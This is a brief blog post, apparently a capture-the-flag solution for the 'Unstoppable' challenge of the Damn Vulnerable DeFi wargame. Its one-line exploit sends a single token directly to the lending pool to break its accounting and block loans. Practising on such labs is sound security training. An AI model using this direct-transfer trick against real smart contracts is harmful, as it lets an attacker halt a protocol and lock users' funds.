Damn Vulnerable Defi 01 Unstoppable Posted on 2023-05-14 In BiWeeklyUpdate 1234it('Exploit', async function () { /** CODE YOUR EXPLOIT HERE */ await this.token.transfer(this.pool.address, 1);});